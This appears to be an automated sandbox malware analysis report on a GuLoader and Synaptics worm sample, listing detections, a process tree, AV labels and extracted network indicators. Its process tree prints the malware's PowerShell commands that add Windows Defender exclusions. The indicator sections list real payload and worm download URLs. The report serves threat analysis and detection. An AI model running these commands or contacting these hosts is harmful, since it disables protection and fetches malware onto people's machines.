Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
SecuriteInfo.com.Variant.FakeAlert.2.24488.8627

Overview

General Information

Sample Name:SecuriteInfo.com.Variant.FakeAlert.2.24488.8627 (renamed file extension from 8627 to exe)
Analysis ID:634939
MD5:c5bf732066ab84d1abba5b27638a5191
SHA1:07b3b8a0e9008e459bd7ba727dd8380320dbc5ad
SHA256:a4bdfb7869d435589479e095b8d0c9c2b8f987bd3a8c961424376f18c31c650f
Tags:exe
Infos:

Detection

GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Antivirus detection for URL or domain
Antivirus detection for dropped file
Yara detected GuLoader
Snort IDS alert for network traffic
Found malware configuration
Multi AV Scanner detection for submitted file
Antivirus / Scanner detection for submitted sample
Drops PE files to the document folder of the user
Tries to detect virtualization through RDTSC time measurements
Adds a directory exclusion to Windows Defender
Uses dynamic DNS services
Machine Learning detection for dropped file
C2 URLs / IPs found in malware configuration
Contains functionality to detect sleep reduction / modifications
Antivirus or Machine Learning detection for unpacked file
Drops PE files to the application program directory (C:\ProgramData)
One or more processes crash
Contains functionality to query locales information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Queries the installation date of Windows
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Checks if the current process is being debugged
Contains functionality to retrieve information about pressed keystrokes
Found large amount of non-executed APIs
May check if the current machine is a sandbox (GetTickCount - Sleep)
Creates a process in suspended mode (likely to inject code)
Contains functionality for read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Contains functionality to shutdown / reboot the system
May infect USB drives
Found potential string decryption / allocating functions
Contains functionality to call native functions
Contains functionality to launch a control a shell (cmd.exe)
Contains functionality to read the clipboard data
Found dropped PE file which has not been started or loaded
Contains functionality to record screenshots
PE file contains executable resources (Code or Archives)
IP address seen in connection with other malware
Enables debug privileges
Sample file is different than original file name gathered from version info
Extensive use of GetProcAddress (often used to hide API calls)
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to launch a program with higher privileges
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Contains functionality to detect sandboxes (mouse cursor move detection)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • SecuriteInfo.com.Variant.FakeAlert.2.24488.exe (PID: 6280 cmdline: "C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exe" MD5: C5BF732066AB84D1ABBA5B27638A5191)
    • cmd.exe (PID: 6292 cmdline: cmd /c powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6300 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • powershell.exe (PID: 6348 cmdline: powershell -Command "Add-MpPreference -ExclusionPath @($env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
      • powershell.exe (PID: 6700 cmdline: powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" MD5: DBA3E6449E97D4E3DF64527EF7012A10)
    • cmd.exe (PID: 6316 cmdline: cmd /c start "" "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 6356 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • uniformerede.exe (PID: 6432 cmdline: "C:\Users\user\AppData\Local\Temp\uniformerede.exe" MD5: FEDAD1ADEC8A1D90444051B5BDC6445D)
        • ._cache_uniformerede.exe (PID: 6536 cmdline: "C:\Users\user\Desktop\._cache_uniformerede.exe" MD5: C4B2332489C0BA3E3F2A262F1C2C31B8)
        • Synaptics.exe (PID: 6620 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate MD5: 2A1D1C20CCA885322254DD2A22F51097)
          • WerFault.exe (PID: 6284 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 2904 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
          • WerFault.exe (PID: 6872 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 6620 -s 4052 MD5: 9E2B8ACAD48ECCA55C0230D63623661B)
  • Synaptics.exe (PID: 6884 cmdline: "C:\ProgramData\Synaptics\Synaptics.exe" MD5: 2A1D1C20CCA885322254DD2A22F51097)
  • EXCEL.EXE (PID: 6976 cmdline: "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding MD5: 5D6638F2C8F8571C593999C58866007E)
  • cleanup

Malware Configuration

Threatname: GuLoader

{"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}

Yara Signatures

Dropped Files

SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
    C:\ProgramData\Synaptics\RCXCD96.tmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
      C:\Users\user\Documents\DUUDTUBZFW\~$cache1JoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
        C:\Users\user\AppData\Local\Temp\uniformerede.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
          C:\ProgramData\Synaptics\Synaptics.exeJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
            Click to see the 3 entries

            Memory Dumps

            SourceRuleDescriptionAuthorStrings
            00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security
              00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                  00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                    00000009.00000000.357173364.0000000000401000.00000020.00000001.01000000.00000007.sdmpJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                      Click to see the 7 entries

                      Unpacked PEs

                      SourceRuleDescriptionAuthorStrings
                      12.0.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                        9.0.Synaptics.exe.400000.3.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                          12.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                            9.2.Synaptics.exe.400000.0.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                              9.0.Synaptics.exe.400000.2.unpackJoeSecurity_DelphiSystemParamCountDetected Delphi use of System.ParamCount()Joe Security
                                Click to see the 5 entries

                                Sigma Signatures

                                No Sigma rule has matched

                                Snort Signatures

                                Timestamp:192.168.2.369.42.215.25249739802832617 05/27/22-04:38:15.388403
                                SID:2832617
                                Source Port:49739
                                Destination Port:80
                                Protocol:TCP
                                Classtype:A Network Trojan was detected

                                Joe Sandbox Signatures

                                Click to jump to signature section

                                Show All Signature Results

                                AV Detection

                                barindex
                                Antivirus detection for URL or domain
                                Source: http://xred.site50.net/syn/SSLLibrary.dllAvira URL Cloud: Label: malware
                                Antivirus detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Avira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXF979.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\RCXCD96.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\ProgramData\Synaptics\Synaptics.exeAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: WORM/Dldr.Agent.gqrxn
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: TR/Dropper.Gen
                                Source: C:\Users\user\AppData\Local\Temp\RCXDA77.tmpAvira: detection malicious, Label: W2000M/Dldr.Agent.17651006
                                Found malware configuration
                                Source: 00000007.00000002.532970198.00000000030C0000.00000040.00001000.00020000.00000000.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://2.58.149.33/ominz_QLUnxlrvVz46.bin"}
                                Multi AV Scanner detection for submitted file
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeVirustotal: Detection: 62%Perma Link
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeReversingLabs: Detection: 58%
                                Antivirus / Scanner detection for submitted sample
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeAvira: detected
                                Machine Learning detection for dropped file
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Desktop\SecuriteInfo.com.Variant.FakeAlert.2.24488.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\AppData\Local\Temp\YC9w8Aif.exeJoe Sandbox ML: detected
                                Source: C:\Users\user\Documents\DUUDTUBZFW\~$cache1Joe Sandbox ML: detected
                                Source: C:\ProgramData\Synaptics\Synaptics.exeJoe Sandbox ML: detected
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.4.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.2.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.0.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 0.0.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.400000.0.unpackAvira: Label: TR/Dropper.Gen
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.2.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.2.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 0.2.SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.a07634.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 6.2.uniformerede.exe.4b8e14.1.unpackAvira: Label: TR/Patched.Ren.Gen
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 6.0.uniformerede.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 12.0.Synaptics.exe.400000.0.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.3.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: WORM/Dldr.Agent.gqrxn
                                Source: 9.0.Synaptics.exe.400000.1.unpackAvira: Label: W2000M/Dldr.Agent.17651006
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, DEBUG_STRIPPED, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
                                Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49736 version: TLS 1.2
                                Source: unknownHTTPS traffic detected: 172.217.168.14:443 -> 192.168.2.3:49737 version: TLS 1.2
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeRegistry value created: HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Uninstall\URBANITETENSJump to behavior
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: autorun.inf
                                Source: uniformerede.exeBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: [autorun]
                                Source: uniformerede.exe, 00000006.00000000.270423175.0000000000401000.00000020.00000001.01000000.00000004.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 00000009.00000000.364281736.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: autorun.inf
                                Source: Synaptics.exeBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: [autorun]
                                Source: Synaptics.exe, 0000000C.00000002.316350277.0000000000401000.00000020.00000001.01000000.00000007.sdmpBinary or memory string: autorun.inf
                                Source: uniformerede.exe.0.drBinary or memory string: [autorun]
                                Source: uniformerede.exe.0.drBinary or memory string: [autorun]
                                Source: uniformerede.exe.0.drBinary or memory string: autorun.inf
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: [autorun]
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe.9.drBinary or memory string: autorun.inf
                                Source: YC9w8Aif.exe.9.drBinary or memory string: [autorun]
                                Source: YC9w8Aif.exe.9.drBinary or memory string: [autorun]
                                Source: YC9w8Aif.exe.9.drBinary or memory string: autorun.inf
                                Source: ~$cache1.9.drBinary or memory string: [autorun]
                                Source: ~$cache1.9.drBinary or memory string: [autorun]
                                Source: ~$cache1.9.drBinary or memory string: autorun.inf
                                Source: RCXF979.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXF979.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXF979.tmp.9.drBinary or memory string: autorun.inf
                                Source: RCXCD96.tmp.6.drBinary or memory string: [autorun]
                                Source: RCXCD96.tmp.6.drBinary or memory string: [autorun]
                                Source: RCXCD96.tmp.6.drBinary or memory string: autorun.inf
                                Source: Synaptics.exe.6.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.6.drBinary or memory string: [autorun]
                                Source: Synaptics.exe.6.drBinary or memory string: autorun.inf
                                Source: RCXDA77.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXDA77.tmp.9.drBinary or memory string: [autorun]
                                Source: RCXDA77.tmp.9.drBinary or memory string: autorun.inf
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\Users\user\AppData\Local\Temp\uniformerede.exeCode function: 6_2_00409B1C FindFirstFileA,GetLastError,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_00405D74 CloseHandle,GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040290B FindFirstFileW,
                                Source: C:\Users\user\Desktop\._cache_uniformerede.exeCode function: 7_2_0040699E FindFirstFileW,FindClose,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00409B1C FindFirstFileA,GetLastError,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 9_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00406018 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_004099E0 FindFirstFileA,FindClose,FileTimeToLocalFileTime,FileTimeToDosDateTime,
                                Source: C:\ProgramData\Synaptics\Synaptics.exeCode function: 12_2_00409B1C FindFirstFileA,GetLastError,

                                Networking

                                barindex
                                Snort IDS alert for network traffic
                                Source: TrafficSnort IDS: 2832617 ETPRO TROJAN W32.Bloat-A Checkin 192.168.2.3:49739 -> 69.42.215.252:80
                                Uses dynamic DNS services
                                Source: unknownDNS query: name: freedns.afraid.org
                                C2 URLs / IPs found in malware configuration
                                Source: Malware configuration extractorURLs: http://2.58.149.33/ominz_QLUnxlrvVz46.bin
                                Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
                                Source: Joe Sandbox ViewIP Address: 69.42.215.252 69.42.215.252
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
                                Source: Synaptics.exe, 00000009.00000000.353054699.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.358069688.0000000005450000.00000004.00000800.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000002.408273761.0000000005450000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://freedns.afraid.org/api/?action=getdyndns&sha=a30fa98efc092684e8d1c5cff797bcc613562978
                                Source: SecuriteInfo.com.Variant.FakeAlert.2.24488.exe, 00000000.00000002.269486507.0000000000954000.00000004.00000800.00020000.00000000.sdmp, uniformerede.exe, 00000006.00000000.272489274.00000000004A5000.00000002.00000001.01000000.00000004.sdmp, uniformerede.exe, 00000006.00000003.281465224.0000000005E21000.00000004.00000800.00020000.00000000.sdmp, ._cache_uniformerede.exe, 00000007.00000002.531563073.000000000040A000.00000004.00000001.01000000.00000005.sdmp, ._cache_uniformerede.exe, 00000007.00000000.280135055.000000000040A000.00000008.00000001.01000000.00000005.sdmp, uniformerede.exe.0.dr, ._cache_uniformerede.exe.6.dr, Synaptics.exe.6.drString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: http://weather.service.msn.com/data.aspx
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dlX
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SSLLibrary.dll6
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/SUpdate.ini
                                Source: uniformerede.exe, 00000006.00000003.286322922.0000000002210000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniD0
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/SUpdate.iniZ
                                Source: RCXDA77.tmp.9.drString found in binary or memory: http://xred.site50.net/syn/Synaptics.rar
                                Source: Synaptics.exe, 00000009.00000000.350557009.00000000021E0000.00000004.00001000.00020000.00000000.sdmp, Synaptics.exe, 00000009.00000000.357490239.00000000021E0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://xred.site50.net/syn/Synaptics.rarZ
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/apps/remove
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://addinslicensing.store.office.com/orgid/entitlement/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://analysis.windows.net/powerbi/api
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.aadrm.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.aadrm.com/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.omex.office.net/appinfo/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.omex.office.net/appstate/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.office.com/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.office.com/app/query
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.addins.store.officeppe.com/addinstemplate
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.cortana.ai
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnostics.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/feedback
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.diagnosticssdf.office.com/v2/file
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.microsoftstream.com/api/
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.office.net
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.onedrive.com
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/beta/myorg/imports
                                Source: 76A735AA-7941-42FC-A093-50DC74F5224B.13.drString found in binary or memory: https://api.powerbi.com/v1.0/myorg/datasets
